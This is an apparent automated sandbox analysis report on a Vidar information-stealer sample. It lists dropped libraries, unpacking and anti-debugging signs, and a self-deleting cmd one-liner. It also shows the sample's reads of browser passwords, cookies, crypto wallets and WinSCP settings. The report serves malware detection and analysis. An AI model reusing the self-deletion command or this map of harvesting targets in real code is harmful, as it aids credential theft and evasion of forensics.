Source: 0lm81UZm7Y.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 0lm81UZm7Y.exe, nss3[1].dll.1.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: 0lm81UZm7Y.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 0lm81UZm7Y.exe, nss3[1].dll.1.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 0lm81UZm7Y.exe, nss3[1].dll.1.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3[1].dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_00417000 _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,Process32Next,CloseHandle,

1_2_00417000

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4636:120:WilError_01

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 0lm81UZm7Y.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
Source:	Binary string: C:\dunabefadote.pdb source: 0lm81UZm7Y.exe
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source:	Binary string: !Y^C:\dunabefadote.pdb source: 0lm81UZm7Y.exe
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Unpacked PE file: 1.2.0lm81UZm7Y.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Unpacked PE file: 1.2.0lm81UZm7Y.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;

Source: mozglue[1].dll.1.dr	Static PE information: section name: .didat
Source: mozglue.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_0041A730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,

1_2_0041A730

Source: initial sample

Static PE information: section name: .text entropy: 7.98828575349

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\softokn3[1].dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Process created: 'C:\Windows\System32\cmd.exe' /c taskkill /im 0lm81UZm7Y.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\0lm81UZm7Y.exe' & del C:\ProgramData\*.dll & exit
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Process created: 'C:\Windows\System32\cmd.exe' /c taskkill /im 0lm81UZm7Y.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\0lm81UZm7Y.exe' & del C:\ProgramData\*.dll & exit			Jump to behavior

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_00496880 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00496880

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe TID: 5656

Thread sleep count: 47 > 30

Jump to behavior

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\softokn3[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_00492480 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00492694h

1_2_00492480

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_0044E950 GetSystemInfo,

1_2_0044E950

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_0041B590 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	1_2_0041B590
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00496670 FindFirstFileW,FindNextFileW,FindNextFileW,	1_2_00496670
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_0041B810 __wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,	1_2_0041B810
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_0040EB20 _sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,	1_2_0040EB20
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: 1_2_00405D80 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset,	1_2_00405D80

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_0040F150 _strtok,_strtok,_memmove,_memmove,__wgetenv,_memmove,__wgetenv,_memmove,_memmove,_memmove,_memmove,_memmove,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,

1_2_0040F150

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Source: 0lm81UZm7Y.exe, 00000001.00000002.278517897.0000000002F10000.00000004.00000001.sdmp

Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:ENT

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_004A31A7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_004A31A7

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

1_2_0041A730

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_0041A030 GetProcessHeap,HeapAlloc,_strcpy_s,

1_2_0041A030

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_00401000 mov eax, dword ptr fs:[00000030h]

1_2_00401000

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_004A31A7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_004A31A7

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im 0lm81UZm7Y.exe /f

Jump to behavior

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im 0lm81UZm7Y.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\0lm81UZm7Y.exe' & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im 0lm81UZm7Y.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Autofill\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\CC\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Cookies\Edge_Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Cookies\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Cookies\IE_Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Downloads\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Files\Default.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\History\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\information.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\passwords.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Queries volume information: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\screenshot.jpg VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memmove,_memmove,_memset,LocalFree,	1_2_00492480
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	1_2_004AC142
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	1_2_004AB23B

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_00492360 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

1_2_00492360

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_00492360 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

1_2_00492360

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_0041F2B3 __wgetenv,__wgetenv,__wgetenv,_memset,GetVersionExA,CreateDirectoryA,_memset,__wgetenv,DeleteFileA,DeleteFileA,DeleteFileA,

1_2_0041F2B3

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Code function: 1_2_00491AC0 GetUserNameA,

1_2_00491AC0

Stealing of Sensitive Information:

Yara detected Vidar

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 1.2.0lm81UZm7Y.exe.21a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.0lm81UZm7Y.exe.22c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.0lm81UZm7Y.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.0lm81UZm7Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.0lm81UZm7Y.exe.21a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.0lm81UZm7Y.exe.22c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.278284873.00000000021A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.247214194.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0lm81UZm7Y.exe PID: 6636, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?`??	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?`??	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?????`	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?????`	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?`??	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?`??	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?????`	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?????`	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?????`	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?????`	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: 0lm81UZm7Y.exe, 00000001.00000002.278661335.00000000031DE000.00000004.00000001.sdmp	String found in binary or memory: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Wallets\Electrum
Source: 0lm81UZm7Y.exe, 00000001.00000002.278517897.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: \??\C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Wallets\ElectronCash\.
Source: 0lm81UZm7Y.exe	String found in binary or memory: JaxxLiberty
Source: 0lm81UZm7Y.exe, 00000001.00000002.278672020.00000000031EF000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\
Source: 0lm81UZm7Y.exe, 00000001.00000002.278672020.00000000031EF000.00000004.00000001.sdmp	String found in binary or memory: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Wallets\ElectrumLTC
Source: 0lm81UZm7Y.exe, 00000001.00000002.278661335.00000000031DE000.00000004.00000001.sdmp	String found in binary or memory: C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Wallets\Exodusd!
Source: 0lm81UZm7Y.exe, 00000001.00000002.278517897.0000000002F10000.00000004.00000001.sdmp	String found in binary or memory: \??\C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ2Y5TWZ\files\Wallets\MultiDoge\.*q

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\0lm81UZm7Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match

